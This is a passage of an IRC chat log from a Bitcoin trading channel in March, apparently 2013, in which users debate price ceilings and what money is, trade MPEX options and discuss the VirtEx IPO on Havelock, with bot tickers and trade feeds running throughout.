services on earth Mar 21 18:13:31 however you choose to denominate that Mar 21 18:13:54 MJR_: you're not accounting for the fact that people can lend money Mar 21 18:14:00 or create derivitives Mar 21 18:14:11 (or are those services) Mar 21 18:14:27 well...that is not real...I was just talking to someone about this yesterday Mar 21 18:14:45 what I love about options on mpex Mar 21 18:14:46 how's it not real? Mar 21 18:15:04 what is my potential loss when selling a call? Mar 21 18:15:18 most people would say infinite Mar 21 18:15:29 but that is only one way to look at it Mar 21 18:15:39 the other way is one bitcoin Mar 21 18:15:59 I can only lose one bitcoin because its a contract to buy one bitcoin Mar 21 18:16:20 so...viewing "money" as assets Mar 21 18:16:37 but money is more complicated than just assets Mar 21 18:16:37 cuts through the fog of derivatives and lending Mar 21 18:16:54 for the sake of argument and simple math let's value the global economy at $21 trillion Mar 21 18:16:57 if I say a barrel of oil Mar 21 18:17:15 that would put the theoretical ceiling at $1,000,000 USD / BTC Mar 21 18:17:16 lol Mar 21 18:17:19 what is the global economy so were clear Mar 21 18:17:55 it's outside the scope of this discussion i think Mar 21 18:17:57 if i lend 1 btc to a person with good enough credit in the community, i can treat the owenership of that loan as money (about equal to 1 btc) Mar 21 18:17:58 just ballparking Mar 21 18:18:17 well...maybe Mar 21 18:18:25 fractional reserve style... Mar 21 18:18:39 not fractional reserve tho Mar 21 18:18:40 i mean that's if every fiat currency goes poof and everyone adopts BTC Mar 21 18:18:48 but if you view the global economy as all the stuff and hours in the world Mar 21 18:18:52 i'm not lending out others deposits Mar 21 18:19:00 who's doing fractional reserve bitcoin lending? Mar 21 18:19:01 lol Mar 21 18:19:06 now would be a good time to get started Mar 21 18:19:07 nobody I know of Mar 21 18:19:23 doubt people would take too kindly to that Mar 21 18:19:34 i certainly wouldn't Mar 21 18:19:39 me neither Mar 21 18:19:53 the way to do that is with certificates of deposit Mar 21 18:19:56 you can do lending and create more money w/o doing fractional reserve. so there is more money than goods and services Mar 21 18:20:07 that was my point Mar 21 18:20:11 well... Mar 21 18:20:20 in a sense I suppose Mar 21 18:20:34 but lets say I lend u 100 BTC Mar 21 18:20:44 but now I want to buy something Mar 21 18:20:59 well double entry accounting says I have a receivable Mar 21 18:21:02 an asset Mar 21 18:21:12 you have a liability Mar 21 18:21:19 all that's much more complicated, i just think anyone saying there's a hard ceiling for USD/BTC in the double or even triple digits is BSing Mar 21 18:21:41 there isn't, my point is it's high time to remember what money is Mar 21 18:21:55 money is what you can buy with it Mar 21 18:22:06 an abstraction Mar 21 18:22:28 the value of currency can fluctuate Mar 21 18:22:33 but money is money Mar 21 18:22:43 stuff and time Mar 21 18:23:17 Mar 21 18:24:11 buy my options :D Mar 21 18:24:48 lolwut Mar 21 18:25:05 $depth o.btcusd.c49n Mar 21 18:25:06 smickles: An error has occurred and has been logged. Please contact this bot's administrator for more information. Mar 21 18:25:30 $depth o.btcusd.c490n Mar 21 18:25:31 smickles: Bids: ['1000 @ 0.29444229'] Mar 21 18:25:32 smickles: Asks: ['1000 @ 0.4490245', '9 @ 5.0'] Mar 21 18:25:44 at fuppin' 5btc Mar 21 18:25:47 srsly Mar 21 18:25:56 ;;calc 49/(1-5) Mar 21 18:25:56 -12.25 Mar 21 18:31:46 ;;ticker Mar 21 18:31:50 BTCUSD ticker | Best bid: 70.50003, Best ask: 70.55000, Bid-ask spread: 0.04997, Last trade: 70.91209, 24 hour volume: 93150.81477258, 24 hour low: 62.50130, 24 hour high: 71.25000, 24 hour vwap: 66.30872 Mar 21 18:32:18 ;;calc (66.30-41)/66.30 Mar 21 18:32:19 0.381598793363 Mar 21 18:33:00 it can never be worth more than 1 right? Mar 21 18:33:02 MJR_: mpex uses bc,24hprc, if that's what you were calcin' Mar 21 18:33:10 ah yes Mar 21 18:33:40 ;;calc 75/.01 Mar 21 18:33:41 7500 Mar 21 18:33:48 gribble can give that? or do I have to use mpexbot? Mar 21 18:33:56 ;;calc 49/.01 Mar 21 18:33:56 4900 Mar 21 18:34:06 ;;bc,24hprc Mar 21 18:34:09 66.21 Mar 21 18:34:29 ;;calc (66.21-41)/66.21 Mar 21 18:34:30 0.380758193626 Mar 21 18:34:41 0_o Mar 21 18:34:49 MJR_: a c490n would break even at a price of 4900usd/btc if sold at ~ 1 Mar 21 18:35:05 ah Mar 21 18:35:13 so 5 is mind melting Mar 21 18:35:18 yes lol Mar 21 18:35:45 these 41 calls have been good to me Mar 21 18:36:02 the c490n is a 'fat finger' play Mar 21 18:36:03 ;;bc,stats Mar 21 18:36:05 Current Blocks: 227191 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 616 blocks | Next Difficulty In About: 2 days, 18 hours, 17 minutes, and 45 seconds | Next Difficulty Estimate: 6427426.4485 | Estimated Percent Change: 32.58858 Mar 21 18:36:09 though im kicking myself for selling half of mine at 2x my price Mar 21 18:36:14 ;;estimate Mar 21 18:36:15 Next difficulty estimate | 6427426.4485 based on data since last change | 7111506.45763 based on data for last three days Mar 21 18:36:26 MJR_: you couldn't've known Mar 21 18:36:32 i took profits too Mar 21 18:36:47 and then it just kept going up Mar 21 18:37:29 so hopefully span and cyprus get a full scale bitcoin economy going. that would be lovely Mar 21 18:37:44 yes! Mar 21 18:38:01 I figured that now im playing with the houses money Mar 21 18:38:13 as this half is profit Mar 21 18:38:36 someone at work wanted to short Mar 21 18:38:44 heh, that's a good idea which the casino's made up to get your money back in their hands Mar 21 18:38:55 yeah Mar 21 18:38:59 btw regarding conversation of cieling on BTC, you need to consider aggregate asset values, not annual GDP... Take a look at http://answers.yahoo.com/question/index?qid=20071029233836AAnbTnr Mar 21 18:40:56 yes I agree Mar 21 18:41:09 but it is hard to calculate on that scale Mar 21 18:41:58 valuation is one of the hardest things and one of the most important things Mar 21 18:42:11 I think Mar 21 18:42:26 $depth o.btcusd.c310t Mar 21 18:42:26 it's subjective at the end of the day Mar 21 18:42:27 smickles: Bids: ['1000 @ 0.53338816', '2 @ 0.42751695'] Mar 21 18:42:28 smickles: Asks: ['1 @ 0.63235001', '1000 @ 0.64887279'] Mar 21 18:42:49 ;;calc 36/(1-.63) Mar 21 18:42:49 97.2972972973 Mar 21 18:46:40 [BTCTC] [S.MPOE-PT] 210 @ 0.00072 = 0.1512 BTC [-] Mar 21 18:46:52 [BTCTC] [COGNITIVE] 1 @ 0.17501 BTC [-] Mar 21 18:46:54 [BTCTC] [COGNITIVE] 2 @ 0.175 = 0.35 BTC [-] Mar 21 18:46:55 [BTCTC] [COGNITIVE] 1 @ 0.17002 BTC [-] Mar 21 18:46:58 [BTCTC] [COGNITIVE] 1 @ 0.17 BTC [-] Mar 21 18:47:01 [BTCTC] [COGNITIVE] 2 @ 0.16 = 0.32 BTC [-] Mar 21 18:47:03 [BTCTC] [COGNITIVE] 2 @ 0.15 = 0.3 BTC [-] Mar 21 18:47:05 [BTCTC] [COGNITIVE] 2 @ 0.14 = 0.28 BTC [-] Mar 21 18:47:27 what is cognitive? Mar 21 18:47:53 [BTCTC] [ASICMINER-PT] 1 @ 0.85896 BTC [+] Mar 21 18:47:56 [BTCTC] [ASICMINER-PT] 1 @ 0.85897 BTC [+] Mar 21 18:48:49 MJR_: "Cognitive Mining is a well established and trusted entity which was previously traded on GLBSE, but only because of the closure is moving here. Cognitive will significantly increase BTC-TC revenue via trade fees, and increase site exposure and trust because a trusted entity is trusting you!" Mar 21 18:49:08 isn't it funny that they tell you they are trusted? Mar 21 18:49:36 its terrible is what it is. Mar 21 18:49:45 lol Mar 21 18:50:15 that is ugly from purely a grammar and style sense Mar 21 18:50:38 but they should just skip ahead to the tautology club Mar 21 18:51:05 that guy is just a kid Mar 21 18:51:30 in years he will look back at this and be embarassed Mar 21 18:51:33 best argument for why bitcoin is a game Mar 21 18:51:56 the kids involved now will be too embarassed in a few years Mar 21 18:52:16 unless they held onto a pile of btc Mar 21 18:52:20 "naw, that wasn't real money, that was a game. Like warhammere 40k" Mar 21 18:53:01 some are born to sweet delight, some are born to endless night Mar 21 18:53:22 lol Mar 21 18:53:38 you know what's awesome? Mar 21 18:53:55 when your hedge to the main position does great too Mar 21 18:53:59 then next line ? Mar 21 18:54:14 though its an imperfect hedge Mar 21 18:54:54 I hedge my portfolio partially with lending dollars on bitfinex Mar 21 18:57:21 ok, well, the next line in the sand is 84 Mar 21 18:58:45 yeah speaking of, 100$ will make me look ridiculus Mar 21 18:58:50 if hit soon Mar 21 18:59:44 at this rate, very soon Mar 21 19:00:39 http://bitbet.us/bet/316/bitcoin-to-trade-at-100-usd-by-the/ Mar 21 19:00:48 not much game?? Mar 21 19:01:08 time between blocks now at 6.46 min.... damn - mining is about to become really hard... Mar 21 19:01:14 ;;bc,stats Mar 21 19:01:16 Current Blocks: 227193 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 614 blocks | Next Difficulty In About: 2 days, 18 hours, 4 minutes, and 50 seconds | Next Difficulty Estimate: 6427539.17082 | Estimated Percent Change: 32.5909 Mar 21 19:01:27 32% Mar 21 19:01:57 [HAVELOCK] [VTX] 10 @ 0.4102 = 4.102 BTC Mar 21 19:01:58 ;;ticker Mar 21 19:01:59 BTCUSD ticker | Best bid: 72.00055, Best ask: 72.01000, Bid-ask spread: 0.00945, Last trade: 72.01000, 24 hour volume: 93554.33064456, 24 hour low: 62.50130, 24 hour high: 72.35000, 24 hour vwap: 66.47931 Mar 21 19:04:05 73 Mar 21 19:04:43 [BTCTC] [ASICMINER-PT] 2 @ 0.85897 = 1.7179 BTC [+] Mar 21 19:05:03 [HAVELOCK] [SDICE] 2 @ 0.4600001 = 0.92 BTC [+] Mar 21 19:05:04 [HAVELOCK] [SDICE] 1 @ 0.46 BTC [-] Mar 21 19:06:08 [HAVELOCK] [VTX] 3 @ 0.4102 = 1.2306 BTC Mar 21 19:08:24 [BTCTC] [GSDPT] 100 @ 0.00425 = 0.425 BTC [-] Mar 21 19:09:10 [BTCTC] [GSDPT] 100 @ 0.0042 = 0.42 BTC [-] Mar 21 19:09:20 latest mtgox high 74.9 Mar 21 19:09:56 [MPEX] [S.DICE] 75 @ 0.00496604 = 0.3725 BTC [-] Mar 21 19:10:08 holy moly Mar 21 19:10:42 ;;ticker Mar 21 19:10:43 BTCUSD ticker | Best bid: 74.43201, Best ask: 74.70000, Bid-ask spread: 0.26799, Last trade: 74.43201, 24 hour volume: 94640.92768269, 24 hour low: 62.50130, 24 hour high: 74.90000, 24 hour vwap: 66.64683 Mar 21 19:11:38 [BTCTC] [PAJKA.BOND] 1 @ 0.108999 BTC [+] Mar 21 19:11:40 [BTCTC] [COGNITIVE] 1 @ 0.14003 BTC [+] Mar 21 19:11:51 ;;calc 5500 * 0.00496604 Mar 21 19:11:51 27.31322 Mar 21 19:11:53 [MPEX] [O.BTCUSD.C750T] 4 @ 0.06357617 = 0.2543 BTC Mar 21 19:12:07 [BTCTC] [COGNITIVE] 1 @ 0.14002 BTC [-] Mar 21 19:12:31 ;;calc 27.31322 * 74.90 Mar 21 19:12:32 2045.760178 Mar 21 19:12:40 [BTCTC] [COGNITIVE] 8 @ 0.14 = 1.12 BTC [-] Mar 21 19:13:14 [BTCTC] [COGNITIVE] 1 @ 0.12205 BTC [-] Mar 21 19:14:40 [BTCTC] [GSDPT] 11 @ 0.0042 = 0.0462 BTC [-] Mar 21 19:15:26 [MPEX] [S.DICE] 150 @ 0.00450321 = 0.6755 BTC [-] Mar 21 19:15:35 ;;goxlag Mar 21 19:15:35 0.064766 seconds Mar 21 19:15:55 ;;ticker Mar 21 19:15:55 BTCUSD ticker | Best bid: 74.01505, Best ask: 74.29875, Bid-ask spread: 0.28370, Last trade: 74.01505, 24 hour volume: 95240.44718836, 24 hour low: 62.50130, 24 hour high: 74.90000, 24 hour vwap: 66.69937 Mar 21 19:16:03 ;;asks 80 Mar 21 19:16:03 There are currently 7596.5366 bitcoins offered at or under 80.0 USD, worth 589106.947162 USD in total. | Data vintage: 119.0183 seconds Mar 21 19:16:06 whoa Mar 21 19:16:18 here we come $100 Mar 21 19:16:26 ;;asks 85 Mar 21 19:16:27 There are currently 10524.979 bitcoins offered at or under 85.0 USD, worth 822437.142286 USD in total. | Data vintage: 2.3512 seconds Mar 21 19:16:33 yoooo Mar 21 19:16:35 [HAVELOCK] [VTX] 20 @ 0.003 = 0.06 BTC [-] Mar 21 19:16:42 ;;asks 89.99 Mar 21 19:16:42 There are currently 11537.613 bitcoins offered at or under 89.99 USD, worth 910459.618314 USD in total. | Data vintage: 17.3556 seconds Mar 21 19:16:55 ;;asks 99.99 Mar 21 19:16:55 There are currently 19291.337 bitcoins offered at or under 99.99 USD, worth 1669256.72911 USD in total. | Data vintage: 30.9742 seconds Mar 21 19:17:17 [MPEX] [O.BTCUSD.C750T] 3 @ 0.06156249 = 0.1847 BTC [-] Mar 21 19:17:45 [HAVELOCK] [VTX] 50 @ 0.003 = 0.15 BTC [-] Mar 21 19:18:03 [HAVELOCK] [SDICE] 1 @ 0.45 BTC [-] Mar 21 19:18:39 [HAVELOCK] [VTX] 100 @ 0.003 = 0.3 BTC [-] Mar 21 19:19:05 [HAVELOCK] [VTX] 75 @ 0.003 = 0.225 BTC [-] Mar 21 19:19:30 [MPEX] [S.DICE] 125 @ 0.00450321 = 0.5629 BTC [-] Mar 21 19:19:43 ;;goxlag Mar 21 19:19:43 1.706159 seconds Mar 21 19:20:09 [BTCTC] [BTC-BOND] 2 @ 0.0099 = 0.0198 BTC [+] Mar 21 19:20:13 [HAVELOCK] [VTX] 99 @ 0.003 = 0.297 BTC [-] Mar 21 19:20:44 [HAVELOCK] [VTX] 500 @ 0.003 = 1.5 BTC [-] Mar 21 19:20:45 [HAVELOCK] [VTX] 500 @ 0.003 = 1.5 BTC [-] Mar 21 19:21:02 [HAVELOCK] [SDICE] 6 @ 0.44002 = 2.6401 BTC [-] Mar 21 19:21:21 [HAVELOCK] [VTX] 900 @ 0.003 = 2.7 BTC [-] Mar 21 19:21:53 bitcoincharts died for me :( Mar 21 19:22:10 nvm, back Mar 21 19:22:11 yeah, its been awol for a hot minute Mar 21 19:22:20 fuck Mar 21 19:22:23 I wish they showed how many orders they do per day Mar 21 19:22:26 vtx price was waaaaaaaaay off Mar 21 19:23:29 would be a better measure of liquidity Mar 21 19:24:04 [MPEX] [O.BTCUSD.C750T] 2 @ 0.06211269 = 0.1242 BTC [+] Mar 21 19:30:10 topace, the shares were undersold at .003? Mar 21 19:31:56 [MPEX] [O.BTCUSD.C750T] 1 @ 0.06263959 BTC [+] Mar 21 19:33:58 yea the rate calculuation fucked up Mar 21 19:33:58 fixing now Mar 21 19:34:01 brefore brign it back up Mar 21 19:34:26 ouch, are you gonna reverse thos etrades? Mar 21 19:36:05 poor sdice... http://www.satoshidice.com/full.php?tx=d602ad09f967f11d50fcb2f98df8d001a812ce4965d6e69340f8961aeb32f27c Mar 21 19:36:10 so avalon is 7500$ today Mar 21 19:36:16 not bad Mar 21 19:36:45 [MPEX] [S.MPOE] 7700 @ 0.00072255 = 5.5636 BTC [-] Mar 21 19:39:37 Won't a big sdice win like that just encourage more desperate rubes to flush their bitcoins away? Mar 21 19:39:50 yep Mar 21 19:39:52 :) Mar 21 19:40:03 👍 Mar 21 19:45:49 that guy looked like an idiot on Bloomberg video Mar 21 19:49:41 ;;ticker Mar 21 19:49:42 BTCUSD ticker | Best bid: 72.80000, Best ask: 72.80001, Bid-ask spread: 0.00001, Last trade: 72.80000, 24 hour volume: 96873.60013063, 24 hour low: 62.50130, 24 hour high: 74.90000, 24 hour vwap: 67.02669 Mar 21 19:49:48 ;;goxlag Mar 21 19:49:48 0 seconds Mar 21 19:58:05 strangely, I think we are going to see a bunch of new money coming in Mar 21 19:58:27 ;;ticker Mar 21 19:58:28 BTCUSD ticker | Best bid: 72.80003, Best ask: 73.60691, Bid-ask spread: 0.80688, Last trade: 73.60691, 24 hour volume: 97393.33155240, 24 hour low: 62.50130, 24 hour high: 74.90000, 24 hour vwap: 67.08461 Mar 21 19:58:33 bejesus Mar 21 19:58:36 lol Mar 21 19:58:47 can't turn your head without it jumping Mar 21 19:59:13 fixified Mar 21 19:59:14 :D Mar 21 20:01:26 remember i made this in feb http://shrani.si/f/3l/OQ/2JCCgxKS/critpred3.png Mar 21 20:01:32 and it was looking optimistic or somthing Mar 21 20:01:39 we are way past the scale of the chart. Mar 21 20:01:51 [HAVELOCK] [VTX] 130 @ 0.3899 = 50.687 BTC [+] Mar 21 20:02:06 [HAVELOCK] [VTX] 20 @ 0.3899 = 7.798 BTC [+] Mar 21 20:02:29 [HAVELOCK] [VTX] 8 @ 0.3899 = 3.1192 BTC [+] Mar 21 20:03:09 kakobrekla indeed. Mar 21 20:03:19 [MPEX] [S.MPOE] 1450 @ 0.00072255 = 1.0477 BTC [-] Mar 21 20:03:21 [MPEX] [S.MPOE] 1167 @ 0.00072659 = 0.8479 BTC [+] Mar 21 20:03:22 [MPEX] [S.MPOE] 6383 @ 0.00073058 = 4.6633 BTC [+] Mar 21 20:03:29 nice! Mar 21 20:04:06 ;;calc 2500 * 0.00073058 Mar 21 20:04:07 1.82645 Mar 21 20:04:11 [HAVELOCK] [VTX] 174 @ 0.3899 = 67.8426 BTC [+] Mar 21 20:04:56 [BTCTC] [MININGCO.ETF] 2 @ 0.63 = 1.26 BTC [+] Mar 21 20:05:19 [MPEX] [S.DICE] 725 @ 0.00450321 = 3.2648 BTC [-] Mar 21 20:05:24 [MPEX] [S.DICE] 675 @ 0.0045032 = 3.0397 BTC [-] Mar 21 20:05:26 [MPEX] [S.DICE] 8600 @ 0.0043113 = 37.0772 BTC [-] Mar 21 20:06:30 i had no idea cavirtex is actually making money. Mar 21 20:06:33 [HAVELOCK] [VTX] 12 @ 0.3899 = 4.6788 BTC [+] Mar 21 20:06:35 [HAVELOCK] [VTX] 10 @ 0.3899 = 3.899 BTC [+] Mar 21 20:06:39 they arent Mar 21 20:06:46 they have revenue Mar 21 20:06:47 no profit Mar 21 20:07:14 hum Mar 21 20:07:48 raising 5k btc for 10% so a 50k btc float predicated on 37k monthly trade of which they charge what, 1% ? 0.5% ? Mar 21 20:08:00 [HAVELOCK] [VTX] 5 @ 0.3899 = 1.9495 BTC [+] Mar 21 20:08:19 [HAVELOCK] [VTX] 1 @ 0.3899 BTC [+] Mar 21 20:08:47 !ticker havelock vtx Mar 21 20:08:49 [HAVELOCK:VTX] 1D: 0.38990000 / 0.4020257 / 0.45780000 (498 shares, 200.20880000 BTC), 7D: 0.38990000 / 0.40701368 / 0.46140000 (570 shares, 231.99780000 BTC), 30D: 0.38990000 / 0.40701368 / 0.46140000 (570 shares, 231.99780000 BTC) Mar 21 20:10:47 [MPEX] [O.BTCUSD.C750T] 1 @ 0.06458438 BTC [+] Mar 21 20:11:04 ;;calc 75/(1-.06458438) Mar 21 20:11:04 80.1782634333 Mar 21 20:11:20 [HAVELOCK] [VTX] 3 @ 0.3899 = 1.1697 BTC [+] Mar 21 20:11:22 cavirtex makes 3% on both sides of a trade. It's kind of gross. Mar 21 20:11:25 can't even argue with him anymore. Mar 21 20:11:31 kakobrekla: nice charts, what assumptions did you use? I'm still foggy on difficulty driving price. Mar 21 20:11:33 ColdHardMetal what, seriously ? Mar 21 20:11:35 $vwap ^oix Mar 21 20:11:36 smickles: 1 day: no data 7 day: average: 55.42906834 high: 57.60574549 low: 51.19305144 volume: 14257 btc: 1202.67534357 30 day: no data Mar 21 20:11:39 yep. Mar 21 20:11:51 [HAVELOCK] [VTX] 10 @ 0.3899 = 3.899 BTC [+] Mar 21 20:11:51 ;;calc 37 * 6% Mar 21 20:11:52 Error: unexpected EOF while parsing (, line 1) Mar 21 20:11:56 ;;calc 37 * .06 Mar 21 20:11:57 2.22 Mar 21 20:12:02 2k a month isn't too bad. Mar 21 20:12:10 [HAVELOCK] [VTX] 20 @ 0.3899 = 7.798 BTC [+] Mar 21 20:12:30 if they use the ipo funding to actually get registered with the whatever proper authorities / get a banking partner this may work out well for everyone. Mar 21 20:12:38 unbalanced that is one of the first results, after 30days runtime, the fit was better, input data is price per difficulty Mar 21 20:12:44 That seems to be the plan Mar 21 20:12:56 unbalanced o, they said so ? that;'s constructive then. Mar 21 20:13:14 Canadian securities regs aren't far off SEC. I'd be surprised if they aren't in violationalready tbh. Mar 21 20:13:20 [MPEX] [S.DICE] 2943 @ 0.0043113 = 12.6882 BTC [-] Mar 21 20:13:21 They're pretty far along that as far as payment processing / licensing Mar 21 20:13:21 [MPEX] [S.DICE] 12023 @ 0.004101 = 49.3063 BTC [-] Mar 21 20:13:24 [MPEX] [S.DICE] 8400 @ 0.004 = 33.6 BTC [-] Mar 21 20:13:45 [HAVELOCK] [VTX] 10 @ 0.3899 = 3.899 BTC [+] Mar 21 20:14:10 VTX "prospectus": https://www.havelockinvestments.com/reportdownload.php?id=7 Mar 21 20:14:45 Disclosure: I want to own some but will have to wait. Mar 21 20:14:48 bah pdf Mar 21 20:14:52 no dividends? Mar 21 20:14:56 Correct Mar 21 20:15:04 AFAICT Mar 21 20:15:18 growing rapidly. VirtEx is experiencing explosive growth shown by: Revenue increasing 146% in the last 2 months (Jan/Feb 2013) Mar 21 20:15:28 conveniently not pointing out this is fiat growth and thus irrelevant, right ? Mar 21 20:16:07 i couldnt find a reason to buy in Mar 21 20:16:30 ColdHardMetal Greater than 2500 0.50%. I dunno how defensible that 3% is given that 100 per monht... Mar 21 20:16:45 [HAVELOCK] [VTX] 25 @ 0.3898 = 9.745 BTC [-] Mar 21 20:17:03 also their website is missing the Buy $1m button Mar 21 20:17:29 not to mention it has no Buy Now button at all... Mar 21 20:17:34 I don't think it's defensible at all. However in my case it's easier than having to go through multiple wires and currency conversions to get funds where I need them, so I just suck it up and pay. Mar 21 20:17:40 "with opportunity to continue growing rapidly as more Canadians learns about the Bitcoin" Mar 21 20:17:42 haha Mar 21 20:18:14 ColdHardMetal if you only need ~100 i'd imagine you're connected enough to handle it otc ? Mar 21 20:19:10 100BTC per 120d is the threshold to escape 3% Mar 21 20:19:33 Maybe, but speed counts sometimes. I don't really use them often, every 2-3 months. I can use them without having to submit any dox to anyone whcih keeps things simple. Mar 21 20:19:53 so basically they have this construct where the havelock fund owns shares and then the participants on havelock own shares in the fund thus eschewing shareholder reporting Mar 21 20:19:59 this thing is dangerous. Mar 21 20:20:03 [HAVELOCK] [SDICE] 7 @ 0.441 = 3.087 BTC [+] Mar 21 20:20:04 [MPEX] [S.DICE] 1000 @ 0.004 = 4 BTC [-] Mar 21 20:20:19 [MPEX] [S.DICE] 1600 @ 0.004 = 6.4 BTC [-] Mar 21 20:20:49 and they have a short fund. Mar 21 20:20:50 mircea_popescu: theres an option to be listed on the official paperwork even if you own the shares through havelock Mar 21 20:20:59 interesting stuff anyway. Mar 21 20:21:16 topace o there you are. hey, did you announce here and i missed it ? Mar 21 20:21:45 no i ddint really announce it :p Mar 21 20:21:46 They are trying to do this in a way that won't get them shut down. I hope they do well and grow the market. Mar 21 20:21:48 [MPEX] [S.DICE] 4034 @ 0.004 = 16.136 BTC [-] Mar 21 20:22:12 i figured the announcements should be up to virtex themselves :p Mar 21 20:22:14 [HAVELOCK] [VTX] 10 @ 0.3898 = 3.898 BTC [-] Mar 21 20:22:25 topace well why not ? hehe nah. you're their ipo manager, you announce. Mar 21 20:22:26 [HAVELOCK] [VTX] 510 @ 0.3898 = 198.798 BTC [-] Mar 21 20:22:40 scamz! Mar 21 20:23:32 kakobrekla, is that a private algo or something others could play with? Mar 21 20:23:34 unbalanced yeah, well... interesting device. we still don't have enough on how exactly it'd play out to know. Mar 21 20:23:55 (by we i mean my legal doods) Mar 21 20:24:08 where by "others" I mean "me" Mar 21 20:24:12 heh Mar 21 20:24:14 lol Mar 21 20:24:20 [HAVELOCK] [VTX] 3 @ 0.3898 = 1.1694 BTC [-] Mar 21 20:24:32 I thought you were supralegal Mar 21 20:24:33 unbalanced https://bitcointalk.org/index.php?topic=141127.0 < - i didnt update the thread since there was no interest but i can give you the last data i have Mar 21 20:24:53 unbalanced i think so. sometimes people go "no clue" tho. Mar 21 20:25:02 [HAVELOCK] [SDICE] 5 @ 0.44001 = 2.2001 BTC [-] Mar 21 20:25:17 kako you are blowing my mind Mar 21 20:25:29 :p Mar 21 20:25:34 [BTCTC] [PAJKA.BOND] 250 @ 0.09 = 22.5 BTC [-] Mar 21 20:25:43 [HAVELOCK] [VTX] 40 @ 0.3898 = 15.592 BTC [-] Mar 21 20:25:51 topace so what's this song and dance with shares could be more expensive than ipo warning thing ? Mar 21 20:25:54 i can't make sense of it. Mar 21 20:26:49 people are flipping the shares Mar 21 20:26:50 ;;rate bingoboingo 1 My Rugatu payment agent Mar 21 20:26:52 Error: For identification purposes, you must be authenticated to use the rating system. Mar 21 20:26:56 bah Mar 21 20:27:02 ;;eauth mircea_popescu Mar 21 20:27:04 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Mar 21 20:27:05 I think on past IPOs people bought at the bid/ask and didn't see that there were IPO shares left. Mar 21 20:27:07 [BTCTC] [PAJKA.BOND] 250 @ 0.09 = 22.5 BTC [-] Mar 21 20:27:09 ThickAsThieves nothing wrong with that neh ? Mar 21 20:27:19 not at all Mar 21 20:27:21 unbalanced where are these shares left ? not in the book ? Mar 21 20:27:33 one of my favorite ways to make money :) Mar 21 20:27:42 [HAVELOCK] [VTX] 75 @ 0.3898 = 29.235 BTC [-] Mar 21 20:27:45 ;;everify freenode:#bitcoin-otc:2a1e8519990917366b20fe81156f46768171939a91c1731376640a70 Mar 21 20:27:46 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu;#bitcoin-otc-uk;#bitcoin-otc-bans;#bitcoin-dev Mar 21 20:27:46 He's just giving dimwits like me a fighting chance. Mar 21 20:27:48 it seems though, Mar 21 20:27:54 that this method helps the flippers Mar 21 20:27:55 ;;everify freenode:#bitcoin-otc:2a1e8519990917366b20fe81156f46768171939a91c1731376640a70 Mar 21 20:27:57 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Mar 21 20:28:00 ;;rate bingoboingo 1 My Rugatu payment agent Mar 21 20:28:02 Rating entry successful. Your rating of 1 for user bingoboingo has been recorded. Mar 21 20:28:03 [HAVELOCK] [SDICE] 2 @ 0.4400001 = 0.88 BTC [-] Mar 21 20:28:05 unbalanced i think this was the last chart i made http://shrani.si/f/36/x3/1yQoSMpP/critticall.png Mar 21 20:28:20 unbalanced but the evolution did continiue Mar 21 20:28:34 unbalanced i don't get it tho. if there's ipo shares left they're in the book at ipo price. you can't buy past them. Mar 21 20:28:45 if they're not in the book then there's not any elft and so... market price Mar 21 20:28:48 what am i missing here Mar 21 20:29:18 the ipo shares are not on the main havelock page for the asset Mar 21 20:29:24 lies Mar 21 20:29:27 uh Mar 21 20:29:29 https://www.havelockinvestments.com/fund.php?symbol=VTX Mar 21 20:29:30 why not ?! Mar 21 20:29:40 The IPO is a separate buy page Mar 21 20:29:50 so they can trick noobs obv Mar 21 20:30:10 kakobrekla, is the scale on the chart in thousands on the left? Mar 21 20:30:24 1000 = 10 Mar 21 20:30:35 the first top is first bubble we had taht went to 30 Mar 21 20:30:35 jesus. Mar 21 20:30:39 topace why ?! Mar 21 20:30:39 but this is per difficulty Mar 21 20:30:45 so its not showing 30 as top Mar 21 20:31:05 whats funnier is that the flippers should be posting trickier asks Mar 21 20:31:21 [HAVELOCK] [VTX] 3 @ 0.3851 = 1.1553 BTC [-] Mar 21 20:31:43 ;;ticker Mar 21 20:31:44 BTCUSD ticker | Best bid: 73.21001, Best ask: 73.40000, Bid-ask spread: 0.18999, Last trade: 73.40000, 24 hour volume: 97553.15321209, 24 hour low: 62.50130, 24 hour high: 74.90000, 24 hour vwap: 67.23243 Mar 21 20:31:53 ;;goxlag Mar 21 20:31:54 0.397807 seconds Mar 21 20:31:55 why is it not just on the open market? Mar 21 20:32:02 yeah Mar 21 20:32:06 becuase the system can do things like limit the number of shares per user Mar 21 20:32:10 when its on the IPO Mar 21 20:32:13 vs the open market Mar 21 20:32:15 why? Mar 21 20:32:22 and also, the ipo price changes Mar 21 20:32:26 limit the shares per user ?! why the heck ? Mar 21 20:32:27 to match $CAD valuation Mar 21 20:32:45 canadian finance is alien Mar 21 20:32:45 mircea_popescu: VTX doesnt limit it Mar 21 20:32:52 but its possible for hte systme to Mar 21 20:33:00 topace i would say this is kludge. keep a single book rather than fragment it. Mar 21 20:33:04 when i luanched the sdice passthru i limited it in the public offerings Mar 21 20:33:14 meh Mar 21 20:33:17 why limits thi? Mar 21 20:33:18 tho Mar 21 20:33:20 i cant argue this now, im late Mar 21 20:33:24 im suppose dto leave half an hour ago Mar 21 20:33:29 so talk to you later Mar 21 20:33:35 back on monday Mar 21 20:33:35 assets never sleeps and never goes anywhere Mar 21 20:33:40 :) Mar 21 20:33:54 Wall Street 2: Money never sleeps Mar 21 20:34:03 i think i get about 30% less sleep now that i bitcoin Mar 21 20:34:03 is it just me, or satoshidice.com borked Mar 21 20:34:04 MJR_ ya but here it sleeps less. Mar 21 20:34:09 lol Mar 21 20:34:20 meanwhile oldies but rather goldies : http://trilema.com/2010/viata-grea-a-blogerului-incepator/ Mar 21 20:34:20 well... Mar 21 20:34:22 [HAVELOCK] [VTX] 100 @ 0.3851 = 38.51 BTC [-] Mar 21 20:34:42 s.dice has great prospects I think Mar 21 20:34:47 smickles i see it Mar 21 20:35:08 it only partially loads for me, heavy traffic maybe? Mar 21 20:35:13 cuz of great market share Mar 21 20:35:15 [HAVELOCK] [VTX] 1 @ 0.3851 BTC [-] Mar 21 20:35:28 ah im an idiot 